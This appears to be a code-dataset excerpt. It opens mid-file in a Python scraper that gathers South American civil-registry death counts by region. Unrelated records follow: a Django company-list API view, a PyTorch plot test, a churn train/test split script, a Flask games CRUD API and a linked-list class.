def_file = next(\n _['value'] for _ in req.json() if (\n (_['value']['tags'] == 'defunciones') and\n ('semanal' in _['value']['nombre'].lower())\n )\n )\n\n req = perkins.requests.do_request(def_file['ver'], max_retry=10)\n fzip = ZipFile(io.BytesIO(req.content))\n\n # Process metadata\n meta_file = next(\n (_ for _ in fzip.namelist() if _.endswith('xlsx')),\n None\n )\n meta_file = fzip.open(meta_file)\n\n meta_df = pd.read_excel(meta_file, header=None, index_col=None)\n meta_df = meta_df.iloc[3:, 1:].T.set_index(keys=3).T\n meta_df.columns = [\n unidecode.unidecode(_.lower()).replace(' ', '_') for _ in meta_df.columns\n ]\n\n # Process def file\n data_file = next(\n (_ for _ in fzip.namelist() if _.endswith('csv')),\n None\n )\n data_file = fzip.open(data_file)\n\n data_sample = data_file.read(4096)\n data_encoding = chardet.detect(data_sample)\n data_file.seek(0)\n\n chile_df = pd.read_csv(\n data_file,\n sep=';',\n encoding=data_encoding['encoding'],\n header=None,\n index_col=None\n )\n\n chile_df.columns = meta_df['nombre_de_la_variable'].str.lower().values\n chile_df['fecha_def'] = pd.to_datetime(chile_df['fecha_def'])\n\n chile_df = chile_df.sort_values('fecha_def')\n chile_df['glosa_reg_res'] = chile_df['glosa_reg_res'].str.replace(\n r'^Del* +', '', regex=True\n )\n\n chile_df['glosa_reg_res'] = chile_df['glosa_reg_res'].replace(CHL_ADM1_MAP)\n chile_df = chile_df[chile_df['glosa_reg_res'] != 'Ignorada']\n\n df = chile_df.groupby([\n 'glosa_reg_res', 'glosa_comuna_residencia', 'fecha_def'\n ])['ano_def'].count().rename('defunciones')\n df = df.reset_index()\n df.columns = ['adm1_name', 'adm3_name', 'date', 'deaths']\n\n df['adm3_name'] = df['adm3_name'].replace({\n 'Coihaique': 'Coyhaique',\n 'Ránquil': 'Ranquil',\n 'Los Ángeles': 'Los Angeles',\n 'Aisén': 'Aysén',\n 'Los Álamos': 'Los Alamos',\n })\n df = df[df['adm3_name'] != 'Antártica']\n\n global geo_sa_df, sa_cities\n\n geo_sa_df_ = geo_sa_df.loc['Chile'].reset_index(['name_2'])['name_2']\n geo_sa_df_ = geo_sa_df_.reset_index('name_1', drop=True)\n geo_sa_df_.index = geo_sa_df_.index.map(unidecode.unidecode).str.lower()\n\n df['adm2_name'] = geo_sa_df_[\n df['adm3_name'].str.lower().apply(unidecode.unidecode)\n ].values\n\n df_deaths = df[['adm1_name', 'date', 'deaths']]\n df_deaths = df_deaths.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='CL',\n frequency='daily',\n country_name='Chile'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n df_cities = df.drop('adm3_name', axis=1)\n df_cities = df_cities.groupby(['adm1_name', 'adm2_name', 'date']).sum()\n\n cities = sa_cities[sa_cities['name_0'] == 'Chile']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='CL',\n frequency='daily',\n country_name='Chile'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nBR_BASE_URL = 'https://transparencia.registrocivil.org.br/especial-covid'\nBR_STATES_URL = 'https://raw.githubusercontent.com/datasets-br/state-codes/master/data/br-state-codes.csv'\nBR_STATES_FETCH_URL = 'https://transparencia.registrocivil.org.br/api/covid-cardiaco'\n\nBR_STATES = 'AC AL AM AP BA CE DF ES GO MA MG MS MT PA PB PE PI PR RJ RN RO RR RS SC SE SP TO'.split(' ')\nBR_STATES_PARAMS = {\n 'start_date': '2020-03-16',\n 'end_date': pd.to_datetime('now').strftime('%Y-%m-%d'),\n 'state': 'all',\n 'city_id': 'all',\n 'chart': 'chartCardiac4',\n 'places[]': [\n 'HOSPITAL', 'DOMICILIO', 'VIA_PUBLICA', 'OUTROS'\n ],\n 'diffCity': False,\n 'cor_pele': 'I'\n}\ndef update_brazil():\n # TODO: cities!\n state_codes = pd.read_csv(BR_STATES_URL)\n state_codes = state_codes.set_index('subdivision')\n\n session = requests.session()\n\n session_headers = perkins.DEFAULT_HEADERS.copy()\n session.get(\n BR_BASE_URL,\n headers=session_headers,\n timeout=30,\n verify=False,\n )\n\n if 'XSRF-TOKEN' in session.cookies:\n session_headers['XSRF-TOKEN'] = session.cookies['XSRF-TOKEN']\n\n df = None\n for state in BR_STATES:\n states_params = BR_STATES_PARAMS.copy()\n states_params['state'] = state\n\n req = session.get(\n BR_STATES_FETCH_URL,\n params=states_params,\n headers=session_headers,\n timeout=90,\n verify=False,\n )\n reqj = req.json()\n\n if 'chart' not in reqj:\n continue\n\n data = pd.DataFrame.from_dict(reqj['chart'])\n data = data.applymap(\n lambda _: _[0]['total'] if type(_) == list else _\n ).T\n data.index = pd.to_datetime(data.index)\n\n data = data.sum(axis=1)\n data = data.reset_index()\n data.columns = ['date', 'deaths']\n data['adm1_name'] = state\n\n df = pd.concat([df, data])\n time.sleep(1.)\n\n df['adm1_name'] = df['adm1_name'].map(\n state_codes['name'].to_dict()\n )\n\n df = df.set_index(['adm1_name', 'date'])\n df = df.sort_index()\n\n df_deaths = storage_format(\n df,\n iso_code='BR',\n frequency='daily',\n country_name='Brazil'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n }\n\n\nECU_PROVINCIAS_MAP = {\n 'Santo Domingo de los Tsachilas': 'Santo Domingo de los Tsachilas',\n 'Sto Dgo Tsachil': 'Santo Domingo de los Tsachilas',\n 'Sto Domingo Tsachilas': 'Santo Domingo de los Tsachilas'\n}\nECU_CANTONES_MAP = {\n 'Alfredo Baquerizo Moreno (jujan)': 'Alfredo Baquerizo Moreno',\n 'Baños de Agua Santa': 'Baños',\n 'El Empalme': 'Empalme',\n 'Francisco de Orellana': 'Orellana',\n 'General Villamil (playas)': 'Playas',\n 'Rio Verde': 'Rioverde',\n 'Yaguachi': 'San Jacinto de Yaguachi'\n}\nECUADOR_URL = 'https://www.registrocivil.gob.ec/registro-civil-cifras-defunciones-2/'\ndef update_ecuador():\n cdata = requests.get(\n ECUADOR_URL,\n verify=False,\n headers=perkins.DEFAULT_HEADERS,\n timeout=120\n )\n cdata = BeautifulSoup(cdata.text, 'html.parser')\n\n cdata_btns = cdata.find_all('tr')\n download_url = next(\n _ for _ in cdata_btns if 'defunciones generales' in _.text.lower()\n ).findChild('a').attrs['href']\n\n cdata = perkins.requests.do_request(\n download_url,\n verify=False,\n headers=perkins.DEFAULT_HEADERS,\n timeout=30\n )\n\n dept_engine = 'xlrd'\n if (\n download_url.endswith('xlsx') or\n (\n 'Content-Location' in cdata.headers and\n cdata.headers['Content-Location'].endswith('xlsx')\n )\n ):\n dept_engine = 'openpyxl'\n\n df = pd.read_excel(cdata.content, engine=dept_engine, header=None)\n df = df[~df.isna().all(axis=1)]\n\n try:\n df_columns = [_.encode('cp1252').decode('utf-8') for _ in df.iloc[0]]\n except:\n df_columns = df.iloc[0]\n\n df_columns = [unidecode.unidecode(_) for _ in df_columns]\n df.columns = [_.lower().replace(' ', '_') for _ in df_columns]\n df = df.iloc[1:]\n\n df = df[df['zona'] != 'ND']\n df = df.drop(['zona', 'mes', 'dia'], axis=1)\n df.iloc[:, :3] = df.iloc[:, :3].applymap(do_title)\n\n df['provincia'] = df['provincia'].replace(ECU_PROVINCIAS_MAP)\n df['canton'] = df['canton'].replace(ECU_CANTONES_MAP)\n\n if df['fecha_defuncion'].dtype == np.int64:\n df_td = df['fecha_defuncion'].apply(\n lambda _: pd.Timedelta(days=_)\n )\n df['fecha_defuncion'] = pd.to_datetime('1899/12/30') + df_td\n\n df = df.groupby([\n 'provincia', 'canton', 'fecha_defuncion'\n ])['parroquia'].count()\n\n df = df.reset_index()\n df.columns = ['adm1_name', 'adm2_name', 'date', 'deaths']\n\n df_deaths = df.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='EC',\n frequency='daily',\n country_name='Ecuador'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n\n cities = sa_cities[sa_cities['name_0'] == 'Ecuador']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='EC',\n frequency='daily',\n country_name='Ecuador'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nCOLOMBIA_TOKEN = 'eyJrIjoiNzU4ZjUwNGEtNjlhNy00NmU4LWJmYTktYTY1YTZiMGFkNjIyIiwidCI6ImJmYjdlMTNhLTdmYjctNDAxNi04MzBjLWQzNzE2ZThkZDhiOCJ9'\nCOLOMBIA_API_URL = 'https://wabi-paas-1-scus-api.analysis.windows.net'\nCOLOMBIA_API_URL = COLOMBIA_API_URL + '/public/reports/querydata?synchronous=true'\ndef update_colombia():\n # This may fail in the future due to a change in the dashboards' uri\n # TODO: fetch directly from: https://experience.arcgis.com/experience/d9bfa6a650a249099b5f290a6c454804/?draft=true\n resource_key = json.loads(base64.b64decode(COLOMBIA_TOKEN))['k']\n\n headers = perkins.DEFAULT_HEADERS.copy()\n headers['X-PowerBI-ResourceKey'] = resource_key\n headers['RequestId'] = str(uuid.uuid4())\n\n CONNECTION = {\n 'application_context': {\n 'DatasetId': '1c8b60ae-edc0-47fb-94e9-28cf505f2e36',\n 'Sources': [{\n 'ReportId': '7e45edd0-e762-4036-a8c9-5505a82ae12a',\n 'VisualId': 'f868698455f8dcb10e52'\n }]\n },\n 'model_id': 1699279\n }\n\n TABLES = {\n 'calendario': {'Name': 'c', 'Entity': 'calendario', 'Type': 0},\n 'Divipola': {'Name': 'd', 'Entity': 'Divipola', 'Type': 0},\n 'Medidas': {'Name': 'm', 'Entity': 'Medidas', 'Type': 0},\n 'Lugar': {'Name': 't', 'Entity': 'Tbl_Ocurrencia_defuncion', 'Type': 0},\n }\n FROM_TABLES = list(TABLES.values())\n\n do_build_fields = lambda table, fields: (\n [perkins.input.powerbi.build_fields(TABLES[table], field) for field in fields]\n )\n\n SELECT_COLUMNS = [\n do_build_fields('calendario', ['Date']),\n do_build_fields('Divipola', ['Departamento']),\n [\n perkins.input.powerbi.build_fields(\n TABLES['Medidas'], _, type='Measure'\n ) for _ in ['Conteo_def_Año_Actual']\n ],\n ]\n SELECT_COLUMNS = itertools.chain(*SELECT_COLUMNS)\n SELECT_COLUMNS = list(SELECT_COLUMNS)\n\n WHERE = [\n perkins.input.powerbi.build_where( # año >= 2021\n TABLES['calendario'],\n column='año',\n value='2022L'\n ),\n perkins.input.powerbi.build_where( # fallecidos > 0\n TABLES['Medidas'],\n column='Conteo_def_Año_Actual',\n value='0L',\n kind=1,\n type='Measure'\n ),\n perkins.input.powerbi.build_where( # tomar datos por lugar de ocurrencia\n TABLES['Lugar'],\n column='lugar_defuncion',\n value=\"'Cod_mun_Ocurrencia'\",\n condition='In'\n ),\n ]\n\n QUERY = perkins.input.powerbi.build_query(\n CONNECTION, FROM_TABLES, SELECT_COLUMNS, WHERE, []\n )\n\n data = requests.post(\n COLOMBIA_API_URL, json=QUERY, headers=headers, timeout=90\n )\n data = data.json()\n\n df = perkins.input.powerbi.inflate_data(\n data, ['date', 'adm1_name', 'deaths']\n )\n df = df.replace('', np.nan).fillna(method='ffill')\n df['date'] = pd.to_datetime(df['date'], unit='ms')\n\n df['adm1_name'] = df['adm1_name'].replace({\n 'BOGOTÁ, D. C.': 'BOGOTA',\n 'ARCHIPIÉLAGO DE SAN ANDRÉS, PROVIDENCIA Y SANTA CATALINA': 'SAN ANDRES Y PROVIDENCIA'\n })\n\n df = df.groupby(['adm1_name', pd.Grouper(key='date', freq='W')]).sum()\n df = df.unstack(level=0).iloc[1:].T.stack().rename('deaths').to_frame()\n df = storage_format(\n df,\n iso_code='CO',\n frequency='weekly',\n country_name='Colombia'\n )\n df['date'] = df['date'] - pd.Timedelta(days=6)\n\n return {\n 'south.america.subnational.mortality': df,\n }\n\n\nPERU_URL = 'https://cloud.minsa.gob.pe/s/g9KdDRtek42X3pg/download'\ndef update_peru():\n cdata = requests.get(PERU_URL, headers=perkins.DEFAULT_HEADERS)\n with py7zr.SevenZipFile(io.BytesIO(cdata.content), mode='r') as archive:\n archive_data = archive.readall()\n df = pd.read_csv([*archive_data.values()][0], encoding='utf-8')\n\n df['FECHA'] = pd.to_datetime(df['FECHA'], dayfirst=True)\n df = df.sort_values('FECHA')\n\n df = df[df['PAIS DOMICILIO'] == 'PERU']\n\n df['DEPARTAMENTO DOMICILIO'] = df['DEPARTAMENTO DOMICILIO'].str.strip()\n df = df[df['DEPARTAMENTO DOMICILIO'].astype(bool)]\n df['PROVINCIA DOMICILIO'] = df['PROVINCIA DOMICILIO'].str.strip()\n df = df[df['PROVINCIA DOMICILIO'].astype(bool)]\n\n df = df.groupby([\n 'DEPARTAMENTO DOMICILIO', 'PROVINCIA DOMICILIO', 'FECHA'\n ])[df.columns[0]].count().reset_index()\n df.columns = ['adm1_name', 'adm2_name', 'date', 'deaths']\n\n df_deaths = df.groupby(['adm1_name', 'date'])['deaths'].sum()\n df_deaths = df_deaths.sort_index()\n\n # Patch Drop Locations: EXTRANJERO/SIN REGISTRO\n df_deaths = df_deaths.drop('EXTRANJERO', level=0, errors='ignore')\n df_deaths = df_deaths.drop('SIN REGISTRO', level=0, errors='ignore')\n\n df_deaths = storage_format(\n df_deaths,\n iso_code='PE',\n frequency='daily',\n country_name='Peru'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n cities = sa_cities[sa_cities['name_0'] == 'Peru']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df['adm2_name'] = df['adm2_name'].str.lower().str.title()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='PE',\n frequency='daily',\n country_name='Peru'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nPARAGUAY_DEPTS = {\n '01': 'Concepción',\n '02': 'San Pedro',\n '03': 'Cordillera',\n '04': 'Guairá',\n '05': 'Caaguazú',\n '06': 'Caazapá',\n '07': 'Itapúa',\n '08': 'Misiones',\n '09': 'Paraguarí',\n '10': 'Alto Paraná',\n '11': 'Central',\n '12': 'Ñeembucú',\n '13': 'Amambay',\n '14': 'Canindeyú',\n '15': 'Presidente Hayes',\n '16': 'Boquerón',\n '17': 'Alto Paraguay',\n '18': 'Asunción'\n}\nPARAGUAY_URL = 'http://ssiev.mspbs.gov.py/20220618/defuncion_reportes/lista_multireporte_defuncion.php'\nPARAGUAY_DATA = {\n 'elegido': 2,\n 'xfila': 'coddist',\n 'xcolumna': 'EXTRACT(MONTH FROM fechadef)',\n 'anio1': 2021,\n 'anio2': 2021,\n 'coddpto': None\n}\ndef do_download_paraguay(dept_code, year=2021):\n data = {\n **PARAGUAY_DATA,\n 'anio1': year,\n 'anio2': year,\n 'coddpto': dept_code\n }\n cdata = requests.post(PARAGUAY_URL, data=data)\n\n df = pd.read_html(\n io.BytesIO(cdata.content), flavor='html5lib', encoding='utf-8'\n )[0]\n df = df.drop(0)\n\n # Parse HTML format\n\n df.columns = df.iloc[0]\n df = df.iloc[1:]\n\n df = df.set_index('Lugar de Defunción/Distrito')\n df = df.drop(['Total', 'EXTRANJERO'], errors='ignore')\n\n df = df.iloc[:, :-1]\n\n df = df.applymap(lambda _: int(str(_).replace('.', '')))\n df = df[df.columns[df.sum() > 0]]\n\n df = df.unstack().reset_index()\n df.columns = ['month', 'lugar', 'deaths']\n\n df['year'] = year\n df = df[['lugar', 'year', 'month', 'deaths']]\n\n df['month'] = df['month'].replace({\n 'Enero': 1, 'Febrero': 2, 'Marzo': 3,\n 'Abril': 4, 'Mayo': 5, 'Junio': 6,\n 'Julio': 7, 'Agosto': 8, 'Septiembre': 9, 'Setiembre': 9,\n 'Octubre': 10, 'Noviembre': 11, 'Diciembre': 12\n })\n\n # format\n\n df['date'] = df[['year', 'month']].apply(\n lambda _: '{}-{}-1'.format(_['year'], _['month']), axis=1\n )\n df['date'] = pd.to_datetime(df['date'])\n\n df = df.groupby(['lugar', 'date'])['deaths'].sum()\n df = df.reset_index()\n\n df.columns = ['adm2_name', 'date', 'deaths']\n df['adm2_name'] = df['adm2_name'].str.lower().str.title()\n df['adm2_name'] = df['adm2_name'].str.replace(\n ' De ', ' de '\n ).str.replace(\n ' Del ', ' del '\n ).str.replace(\n ' El ', ' el ',\n ).str.replace(\n ' La ', ' la ',\n )\n\n return df\n\n\ndef update_paraguay():\n df = pd.DataFrame([])\n\n for year in [2022, 2023]:\n for dept_code, adm1_name in PARAGUAY_DEPTS.items():\n try:\n dept_df = do_download_paraguay(dept_code, year=year)\n dept_df['adm1_name'] = adm1_name\n\n except Exception as e:\n dept_df = None\n\n df = pd.concat([df, dept_df])\n\n df['adm2_name'] = df['adm2_name'].replace({\n 'Mariscal Estigarribia': 'Mariscal Jose Felix Estigarribia'\n })\n df = df[np.roll(df.columns, 1)]\n\n df_deaths = df.groupby(['adm1_name', 'date']).sum()\n df_deaths = df_deaths.sort_index()\n df_deaths = storage_format(\n df_deaths,\n iso_code='PY',\n frequency='monthly',\n country_name='Paraguay'\n )\n df_deaths = df_deaths[DF_ADM1_COLS]\n\n global sa_cities\n cities = sa_cities[sa_cities['name_0'] == 'Paraguay']['name_2']\n cities = pd.concat([cities, cities.apply(unidecode.unidecode)]).drop_duplicates()\n\n df_cities = df.set_index(['adm1_name', 'adm2_name', 'date'])\n df_cities = df_cities.reindex(cities.unique(), level='adm2_name').dropna()\n\n df_cities = df_cities.sort_index()\n df_cities = storage_format(\n df_cities,\n iso_code='PY',\n frequency='monthly',\n country_name='Paraguay'\n )\n df_cities = df_cities[DF_ADM2_COLS]\n\n return {\n 'south.america.subnational.mortality': df_deaths,\n 'south.america.cities.mortality': df_cities\n }\n\n\nBOLIVIA_URL = 'https://raw.githubusercontent.com/sociedatos/bo-mortalidad/main/registro.civil.csv'\ndef update_bolivia():\n df = pd.read_csv(BOLIVIA_URL, index_col=0)\n\n df.index = pd.to_datetime(df.index)\n df = df.unstack().reset_index()\n df.columns = ['adm1_name', 'date', 'deaths']\n\n df = df.set_index(['adm1_name', 'date'])\n df = df.sort_index()\n df = storage_format(\n df,\n iso_code='BO',\n frequency='monthly',\n country_name='Bolivia'\n )\n\n df['adm1_name'] = df['adm1_name'].str.replace(\n 'El Beni', 'Beni'\n )\n\n return {\n 'south.america.subnational.mortality': df,\n }\n\n\ndef do_update(fn):\n print(fn.__name__)\n\n try:\n df_objs = fn()\n except Exception as e:\n traceback.print_exc()\n df_objs = {}\n\n # >= 2021-07-31\n for key, df in df_objs.items():\n # df = df[df['date'] > '2021-07-31'].copy()\n\n df['deaths'] = df['deaths'].astype(int)\n df['date'] = pd.to_datetime(df['date'])\n\n df_objs[key] = df\n\n return df_objs\n\n\nSTORAGE_FILE = './{}.csv'\nDF_NON_INDEX_COLS = ['country_name', 'adm1_isocode', 'frequency', 'deaths']\ndef do_merge(df, path):\n file_name = STORAGE_FILE.format(path)\n base_df = pd.read_csv(file_name)\n\n order_cols = base_df.columns\n index_cols = [_ for _ in order_cols if _ not in DF_NON_INDEX_COLS]\n\n base_df['date'] = pd.to_datetime(base_df['date'])\n base_df = base_df.set_index(index_cols)\n\n df = df.set_index(index_cols)\n df = pd.concat([base_df, df])\n\n df = df[~df.index.duplicated(keep='last')]\n df = df.sort_index()\n\n df = df.reset_index()\n df = df[order_cols]\n df['date'] = pd.to_datetime(df['date']).dt.date\n\n df.to_csv(file_name, index=False)\n\n\nUPDATE_FNS = [\n update_chile,\n update_brazil,\n update_ecuador,\n update_colombia,\n update_peru,\n update_paraguay,\n update_bolivia\n]\nif __name__ == '__main__':\n iso_level_0, iso_geo_names, geo_names = perkins.fetch_geocodes()\n geo_sa_df, sa_cities = get_population()\n final_df = {}\n\n for update_fn in UPDATE_FNS:\n df_objs = do_update(update_fn)\n\n for key, df in df_objs.items():\n fdf = final_df.get(key, None)\n final_df[key] = pd.concat([fdf, df])\n\n for key, df in final_df.items():\n do_merge(df, key)\n","repo_name":"sociedatos/sudamerica-mortalidad","sub_path":"update/update_mortality.py","file_name":"update_mortality.py","file_ext":"py","file_size_in_byte":24851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37479088854","text":"from database.models.company import Company\nfrom django_filters import rest_framework as filters\nfrom drf_spectacular.types import OpenApiTypes\nfrom drf_spectacular.utils import OpenApiParameter, OpenApiResponse, extend_schema\nfrom rest_framework.generics import ListCreateAPIView\nfrom v1_console.serializers import CompanySerializer\nfrom v1_console.serializers.common_serializers import CommonSerializer, OpenApiCompanyListSerializer\nfrom v1_console.views import ConsoleBaseView\n\n\nclass CompanyFilter(filters.FilterSet):\n management_tag = filters.CharFilter(field_name='management_tags', lookup_expr='name', max_length=255)\n company_name = filters.CharFilter(field_name='company_name', lookup_expr='contains', max_length=255)\n corporate_number = filters.CharFilter(field_name='corporate_number', max_length=255)\n provider_id = filters.UUIDFilter(field_name='provider_id')\n\n class Meta:\n model = Company\n fields = ['provider_id', 'company_name', 'corporate_number', 'management_tag', 'status']\n\n\nclass CompanyListAPIView(ConsoleBaseView, ListCreateAPIView):\n queryset = Company.objects.all().prefetch_related('management_tags')\n serializer_class = CompanySerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filterset_class = CompanyFilter\n\n @extend_schema(\n summary=\"企業一覧取得\",\n description=\"事業者に紐付く企業の一覧を取得する。\",\n parameters=[\n OpenApiParameter(\"auth_token\", OpenApiTypes.STR,\n OpenApiParameter.HEADER),\n OpenApiParameter(\"provider_id\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"company_name\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"corporate_number\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n OpenApiParameter(\"management_tag\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n # ステータス\n OpenApiParameter(\"status\", OpenApiTypes.STR,\n OpenApiParameter.QUERY),\n ],\n responses={\n 200: OpenApiCompanyListSerializer,\n 401: OpenApiResponse(\n response=CommonSerializer,\n description='トークン認証エラー\\t\\nトークン有効期限切れ'),\n 403: OpenApiResponse(\n response=CommonSerializer,\n description='利用許可がないアカウント権限')\n }\n )\n def get(self, request):\n return super(CompanyListAPIView, self).get(self, request)\n","repo_name":"WobitaDream/Django_NewPointPlus","sub_path":"django/v1_console/views/company_views.py","file_name":"company_views.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35875706222","text":"import cv2\nimport torch\n\nimport sys\nsys.path.append('.')\nfrom pytorch_inspector.utils.DataPlot import DataPlot\n\ndef test_forceplot2d(tensor):\n fig = DataPlot.tensor_forceplot2D(tensor)\n # plot the image to a numpy array\n image = DataPlot.plt2arr(fig)\n # Fix color and shape\n image = cv2.cvtColor(image, cv2.COLOR_BGRA2RGB)\n image = cv2.resize(image, (int(image.shape[1] / 2), int(image.shape[0] / 2)))\n\n cv2.imshow('image', image)\n cv2.waitKey(0)\n\nif __name__ == \"__main__\":\n tensor = torch.rand((1,140,11,1))\n test_forceplot2d(tensor)","repo_name":"Khoronus/pytorch-inspector","sub_path":"test/plot/test_dataplot.py","file_name":"test_dataplot.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20525519870","text":"import pandas as pd\nimport numpy as np\nimport argparse\nfrom sklearn.model_selection import train_test_split\nimport os\ncnvrg_workdir = os.environ.get(\"CNVRG_WORKDIR\", \"/cnvrg\")\n\nparser = argparse.ArgumentParser(description=\"\"\"Preprocessor\"\"\")\nparser.add_argument(\n \"-f\",\n \"--preprocessed_data\",\n action=\"store\",\n dest=\"preprocessed_data\",\n default=\"/input/data preprocessing/data_df.csv\",\n required=True,\n help=\"\"\"preprocessed data\"\"\",\n)\nparser.add_argument(\n \"--project_dir\",\n action=\"store\",\n dest=\"project_dir\",\n help=\"\"\"--- For inner use of cnvrg.io ---\"\"\",\n)\nparser.add_argument(\n \"--output_dir\",\n action=\"store\",\n dest=\"output_dir\",\n help=\"\"\"--- For inner use of cnvrg.io ---\"\"\",\n)\n\nargs = parser.parse_args()\npreprocessed_data = args.preprocessed_data\npreprocessed_data = pd.read_csv(preprocessed_data)\nprint(preprocessed_data.head())\n# Split data into train and test sets\nX = preprocessed_data.drop('Churn', axis=1)\ny = preprocessed_data['Churn']\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=50)\n\npreprocessed_data.to_csv(cnvrg_workdir+\"/preprocessed_data.csv\", index=False)\nX_test.to_csv(cnvrg_workdir+\"/X_test.csv\", index=False)\ny_train.to_csv(cnvrg_workdir+\"/y_train.csv\", index=False)\ny_test.to_csv(cnvrg_workdir+\"/y_test.csv\", index=False)\nX_train.to_csv(cnvrg_workdir+\"/X_train.csv\", index=False)\n","repo_name":"cnvrg/churn-detection-blueprint","sub_path":"train_test_split/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23378119611","text":"from flask import Blueprint, request, jsonify, render_template\nfrom helpers import token_required\nfrom models import db, User, Game, game_schema, games_schema\n\napi = Blueprint('api',__name__, url_prefix='/api')\n\n\n# @api.route('/getdata')\n# def getdata():\n# return {'yee': 'haw'}\n\n# @api.route('/getdata', methods = ['GET'])\n# @token_required\n# def index():\n# games = Game.query\n# return render_template('bootstrap_table.html', title='Bootstrap Table',\n# games=games)\n\n\n@api.route('/games', methods = ['POST'])\n@token_required\ndef create_game(current_user_token):\n game_id = request.json['game_id']\n title = request.json['title']\n thumbnail = request.json['thumbnail']\n short_description = request.json['short_description']\n game_url = request.json['game_url']\n genre = request.json['genre']\n platform = request.json['platform']\n publisher = request.json['publisher']\n developer = request.json['developer']\n release_date = request.json['release_date']\n freetogame_profile_url = request.json['freetogame_profile_url']\n user_token = current_user_token.token\n\n print(f'BIG TESTER: {current_user_token.token}')\n\n game = Game(game_id, title, thumbnail, short_description,\n game_url,genre,platform,publisher,developer,\n release_date,freetogame_profile_url,\n user_token = user_token )\n\n db.session.add(game)\n db.session.commit()\n\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n@api.route('/games', methods = ['GET'])\n@token_required\ndef get_game(current_user_token):\n a_user = current_user_token.token\n games = Game.query.filter_by(user_token = a_user).all()\n response = games_schema.dump(games)\n return jsonify(response)\n\n\n\n@api.route('/games/<id>', methods = ['GET'])\n@token_required\ndef get_single_game(current_user_token, id):\n game = Game.query.get(id)\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n\n@api.route('/games/<id>', methods = ['POST','PUT'])\n@token_required\ndef update_game(current_user_token,id):\n game = Game.query.get(id)\n game.game_id = request.json['game_id']\n game.title = request.json['title']\n game.thumbnail = request.json['thumbnail']\n game.short_description = request.json['short_description']\n game.game_url = request.json['game_url']\n game.genre = request.json['genre']\n game.platform = request.json['platform']\n game.publisher = request.json['publisher']\n game.developer = request.json['developer']\n game.release_date = request.json['release_date']\n game.freetogame_profile_url = request.json['freetogame_profile_url']\n game.user_token = current_user_token.token\n\n db.session.commit()\n response = game_schema.dump(game)\n return jsonify(response)\n\n\n@api.route('/games/<id>', methods = ['DELETE'])\n@token_required\ndef delete_game(current_user_token, id):\n game = Game.query.get(id)\n db.session.delete(game)\n db.session.commit()\n response = game_schema.dump(game)\n return jsonify(response)","repo_name":"nbnulton/FlaskGamesApp","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20902162777","text":"# This script implements simple linked list\n\nclass Node:\n \"\"\"\n This class is used to represent a Node.\n A Node has a value and a pointer to next Node.\n\n ...\n\n Attributes\n ----------\n value : int\n Value of the node\n next : Node\n Pointer to next node\n\n Methods\n -------\n connect(next=Node)\n Connects current node to the node specified in parameter\n \"\"\"\n\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n \n def connect(self, next):\n \"\"\"Connects current node to the node specified in parameter\n\n Parameters\n ----------\n next : Node\n Node to be connected\n \"\"\"\n\n self.next = next\n \nclass LinkedList:\n \"\"\"\n This class used to represent a LinkedList.\n It has a leading Node called Head.\n\n ...\n\n Attributes\n ----------\n head : Node\n Leading Node of LinkedList\n\n Methods\n -------\n display()\n Prints complete LinkedList\n convert(list)\n Converts an array into LinkedList\n add(value)\n Adds value as a new Node into LinkedList\n remove(value)\n Removes Node with same value from LinkedList\n \"\"\" \n\n def __init__(self, head=Node()):\n self.head = head\n \n def display(self):\n \"\"\"Prints complete LinkedList\n \"\"\"\n\n temp = 